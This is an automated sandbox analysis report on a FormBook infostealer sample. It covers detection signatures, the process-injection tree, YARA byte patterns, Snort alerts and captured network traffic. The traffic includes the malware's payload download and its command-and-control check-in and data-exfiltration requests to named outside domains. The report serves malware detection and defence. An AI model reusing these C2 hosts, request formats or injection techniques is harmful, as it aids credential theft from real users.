Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SC_0017384.exe

Overview

General Information

Sample Name:SC_0017384.exe
Analysis ID:831200
MD5:f296a60e1568722b060de70b46357fe6
SHA1:e24c65bd02d435c6b5705e9a01442e0447b77e22
SHA256:661f40c3448fa2acbddfd8297c54733b9f2d9c71e15506a4fba876a25d279e76
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Encrypted powershell cmdline option found
Machine Learning detection for sample
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • SC_0017384.exe (PID: 5876 cmdline: C:\Users\user\Desktop\SC_0017384.exe MD5: F296A60E1568722B060DE70B46357FE6)
    • powershell.exe (PID: 5040 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • SC_0017384.exe (PID: 5956 cmdline: C:\Users\user\Desktop\SC_0017384.exe MD5: F296A60E1568722B060DE70B46357FE6)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Lvdnyvcvr.exe (PID: 6136 cmdline: "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe" MD5: F296A60E1568722B060DE70B46357FE6)
          • powershell.exe (PID: 4504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • Lvdnyvcvr.exe (PID: 1980 cmdline: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe MD5: F296A60E1568722B060DE70B46357FE6)
        • systray.exe (PID: 5568 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
        • Lvdnyvcvr.exe (PID: 1436 cmdline: "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe" MD5: F296A60E1568722B060DE70B46357FE6)
          • powershell.exe (PID: 6116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • conhost.exe (PID: 572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • Lvdnyvcvr.exe (PID: 5300 cmdline: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe MD5: F296A60E1568722B060DE70B46357FE6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f060:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x18267:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x18065:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b01:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x18167:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x182df:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa9ea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16d5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de07:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f060:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x18267:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 11 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.SC_0017384.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.SC_0017384.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20de3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xcba2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x19fea:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.SC_0017384.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19de8:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x19884:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x19eea:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1a062:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xc76d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18adf:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1fb8a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20b3d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.SC_0017384.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.SC_0017384.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x1ffe3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xbda2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x191ea:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 3 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.5172.67.194.22549710802031453 03/21/23-09:12:13.411086
          SID:2031453
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.574.208.236.13149702802031449 03/21/23-09:11:27.575244
          SID:2031449
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.574.208.236.13149702802031412 03/21/23-09:11:27.575244
          SID:2031412
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.574.208.236.13149702802031453 03/21/23-09:11:27.575244
          SID:2031453
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5172.67.194.22549710802031449 03/21/23-09:12:13.411086
          SID:2031449
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5172.67.194.22549710802031412 03/21/23-09:12:13.411086
          SID:2031412
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: SC_0017384.exeReversingLabs: Detection: 12%
          Source: SC_0017384.exeVirustotal: Detection: 17%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeReversingLabs: Detection: 12%
          Machine Learning detection for sample
          Source: SC_0017384.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeJoe Sandbox ML: detected
          Source: 3.2.SC_0017384.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: SC_0017384.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49698 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49701 version: TLS 1.2
          Source: SC_0017384.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SC_0017384.exe, SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 54.85.86.211 80
          Source: C:\Windows\explorer.exeDomain query: www.myprojoints.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.152.24 80
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.131 80
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.229 80
          Source: C:\Windows\explorer.exeDomain query: www.metatv.app
          Source: C:\Windows\explorer.exeDomain query: www.findmyoriginstory.com
          Source: C:\Windows\explorer.exeDomain query: www.brunaeleandro.com
          Source: C:\Windows\explorer.exeDomain query: www.madisoncountylincoln.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.194.225 80
          Source: C:\Windows\explorer.exeDomain query: www.emprendizajesocial.com
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 74.208.236.131:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 74.208.236.131:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 74.208.236.131:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 172.67.194.225:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 172.67.194.225:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 172.67.194.225:80
          Yara detected Generic Downloader
          Source: Yara matchFile source: 0.2.SC_0017384.exe.6980000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SC_0017384.exe.486b570.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: global trafficHTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0Rf1qUZs10N2udgS/CtBUsUx15VFtNYN9iDnYFh77a6AF4rH5pFyFnuGOqSZvoPy3IjvUZKwOXw== HTTP/1.1Host: www.findmyoriginstory.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g== HTTP/1.1Host: www.emprendizajesocial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXmfsqsK09kjaHK361RIlxqLtgkaoztB9HOqO+kj7AmSjC7tsKJawScM9XI/2xtyFPsJZxirw==&LAIu=TchAG45 HTTP/1.1Host: www.brunaeleandro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOKK/wDsahaMH4CpYcAMUMZFiGwLHjB+0Oq1wXjzAJPnkBdjV2xmRY1HYDRMeq0YWMvPw2aK61dkA== HTTP/1.1Host: www.madisoncountylincoln.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRrzq40ElafmJhvJj1LcshAib7Ivom6LHCQSa6JmmrJNk5dNV7FfRE38dwcSsWQdgWRuTjAoEA==&LAIu=TchAG45 HTTP/1.1Host: www.metatv.appConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 54.85.86.211 54.85.86.211
          Source: global trafficHTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.emprendizajesocial.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.emprendizajesocial.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.emprendizajesocial.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 74 53 67 53 46 6d 4e 55 59 35 38 65 4d 74 73 57 28 58 79 41 56 6c 64 6e 39 42 43 72 31 71 54 51 4f 42 64 6a 6d 49 44 54 4d 68 32 50 45 5a 4c 71 36 69 4d 32 64 4a 77 4c 36 38 32 47 5a 43 64 78 48 68 48 46 55 56 5a 5a 58 4e 70 61 59 45 52 61 28 74 4a 48 54 42 48 4e 59 5a 4b 68 56 73 68 45 79 6f 4d 30 5a 48 4a 59 56 54 6e 61 46 7a 4f 55 38 65 57 49 46 48 4a 63 6b 32 41 63 71 31 6e 62 6f 6c 33 44 77 6a 56 36 50 5a 46 42 33 5a 69 37 34 42 42 65 68 63 6e 44 7e 4b 41 56 6f 69 37 75 55 48 48 44 47 6d 62 76 41 4c 63 4a 36 45 64 55 4a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=tSgSFmNUY58eMtsW(XyAVldn9BCr1qTQOBdjmIDTMh2PEZLq6iM2dJwL682GZCdxHhHFUVZZXNpaYERa(tJHTBHNYZKhVshEyoM0ZHJYVTnaFzOU8eWIFHJck2Acq1nbol3DwjV6PZFB3Zi74BBehcnD~KAVoi7uUHHDGmbvALcJ6EdUJQ).
          Source: global trafficHTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.brunaeleandro.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.brunaeleandro.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.brunaeleandro.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 65 50 49 69 41 6e 77 2d 54 66 4f 72 6f 48 65 71 66 5f 35 72 68 4b 6c 74 30 78 4b 32 4c 4d 79 66 4f 56 4e 53 32 75 66 5a 77 73 78 37 43 32 42 35 49 76 34 33 57 6f 6d 51 58 76 7e 58 67 71 37 4a 70 4d 49 68 52 79 53 6e 36 36 36 67 66 51 54 47 4f 38 6e 6b 33 68 39 4b 30 30 58 59 44 5f 42 34 68 36 4e 38 4f 6f 6a 5a 4c 4f 35 69 53 36 63 51 48 36 74 6c 4b 63 77 74 59 46 78 55 56 61 51 75 69 51 46 6e 59 48 69 75 65 6d 55 63 72 53 4d 37 47 51 6b 6a 30 50 46 70 6c 39 36 47 6f 52 45 7a 35 33 39 39 4e 38 58 70 6e 43 54 63 66 74 6d 51 73 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=ePIiAnw-TfOroHeqf_5rhKlt0xK2LMyfOVNS2ufZwsx7C2B5Iv43WomQXv~Xgq7JpMIhRySn666gfQTGO8nk3h9K00XYD_B4h6N8OojZLO5iS6cQH6tlKcwtYFxUVaQuiQFnYHiuemUcrSM7GQkj0PFpl96GoREz5399N8XpnCTcftmQsw).
          Source: global trafficHTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.madisoncountylincoln.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.madisoncountylincoln.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.madisoncountylincoln.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 57 35 41 4e 77 46 37 41 6f 31 54 79 6c 39 48 44 32 33 6e 46 6f 72 65 6d 49 65 45 44 6d 4b 74 4b 49 6e 49 49 31 5a 5a 67 41 30 4a 48 52 41 69 31 4f 6d 58 56 35 31 7a 52 32 68 76 4b 33 6a 38 71 68 44 63 6f 72 45 6d 4e 78 52 67 32 44 36 6d 4b 58 75 33 48 5a 56 51 57 47 33 32 71 58 63 4a 6b 78 4d 69 49 31 57 65 37 33 41 75 6f 75 73 6d 4d 71 46 6c 57 6a 75 75 48 49 4d 56 68 64 6e 64 67 6e 48 4d 78 47 5f 56 47 57 48 6b 69 7a 4b 34 5a 34 62 42 7a 52 37 7a 52 61 75 6e 30 48 33 54 44 76 43 6c 52 7e 57 38 30 37 57 59 68 46 63 44 73 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=W5ANwF7Ao1Tyl9HD23nForemIeEDmKtKInII1ZZgA0JHRAi1OmXV51zR2hvK3j8qhDcorEmNxRg2D6mKXu3HZVQWG32qXcJkxMiI1We73AuousmMqFlWjuuHIMVhdndgnHMxG_VGWHkizK4Z4bBzR7zRaun0H3TDvClR~W807WYhFcDsng).
          Source: global trafficHTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.metatv.appConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.metatv.appUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.metatv.app/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 28 50 51 4d 33 59 50 4d 61 32 7a 2d 50 59 50 33 34 70 4a 4b 37 70 6e 6c 7a 78 6a 79 6f 72 31 46 7a 36 62 64 51 56 58 45 28 6d 58 48 74 57 39 6b 52 4c 41 55 6e 46 76 4e 5a 77 38 63 55 4a 34 45 30 73 52 7a 72 4a 4e 62 58 39 5a 4b 51 48 44 7a 5a 54 77 72 79 57 49 55 70 58 42 64 50 32 31 55 44 35 68 62 53 63 68 7a 28 55 49 77 77 70 6e 73 4f 4d 76 7a 36 6b 67 67 63 59 6e 6e 4b 33 35 31 6f 53 54 54 53 6e 44 58 48 56 63 4f 51 56 43 4a 39 39 69 75 58 65 6e 30 6a 48 43 59 65 59 69 68 49 47 6f 41 79 64 48 71 38 57 4b 33 53 4f 38 36 74 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=(PQM3YPMa2z-PYP34pJK7pnlzxjyor1Fz6bdQVXE(mXHtW9kRLAUnFvNZw8cUJ4E0sRzrJNbX9ZKQHDzZTwryWIUpXBdP21UD5hbSchz(UIwwpnsOMvz6kggcYnnK351oSTTSnDXHVcOQVCJ99iuXen0jHCYeYihIGoAydHq8WK3SO86tQ).
          Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Tue, 21 Mar 2023 08:11:27 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 